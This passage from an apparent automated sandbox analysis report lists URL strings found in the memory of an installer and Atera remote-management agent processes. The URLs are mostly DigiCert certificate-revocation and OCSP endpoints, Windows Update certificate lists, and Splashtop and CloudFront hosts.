                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                                Source: AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C8F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1283000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA055000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA31E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 
00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlhttp://crl4.digicert.co
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6F6000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A139000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0B9000.00000004.00000800.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E591E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
                                Source: LiteDB.dll.24.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlL
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E591E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlb
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/l
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlrlCache
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedRootG4.crl%
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C7C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1283000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD21EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C8F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA055000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA31E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2A2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 
00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A139000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl8
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/l
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlrlCache
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/-
                                Source: AteraAgent.exe, 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/2_h
                                Source: AteraAgent.exe, 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Pw
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Q
                                Source: AteraAgent.exe, 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/VbN
                                Source: AteraAgent.exe, 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/cb
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/e
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabon
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?1908e7e
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA23D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3d5ae80
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?43a390c
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6c9e1dd
                                Source: AteraAgent.exe, 00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?7160e0b
                                Source: AteraAgent.exe, 00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?9bd3f2b
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a2b53af
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?b87e0f2
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabf
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?7160
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?9bd3
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?c37a
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d17kmd0va0f0mp.cloudfront.net
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d25btwd9wax8gu.cloudfront.net
                                Source: AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://dl.google.com/googletalk/googletalk-setup.exe
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.splashtop.com
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1954314035.000001BE6236E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1954314035.000001BE6236E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ctain
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A09B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://my.splashtop.com
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/dummynamespace/
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/3
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/5
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/ILogReceiverOneWayServer/ProcessLogMessages
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsep
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesT
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/T
                                Source: AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digi
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/3
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2267142526.0000020AA082C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2977989591.0000016BEA6C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978250326.0000016BEA6DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/X
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/l-
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/lN
                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C8F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1283000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA055000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA31E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 
00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1956064131.000001BE7B4B8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA298000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6F6000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2203027448.000002E967DA9000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2084912382.0000022D4CAAB000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 
0000001F.00000002.2087026675.0000022D4CADE000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2085700686.0000022D4CADE000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2084621827.0000022D4CAA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
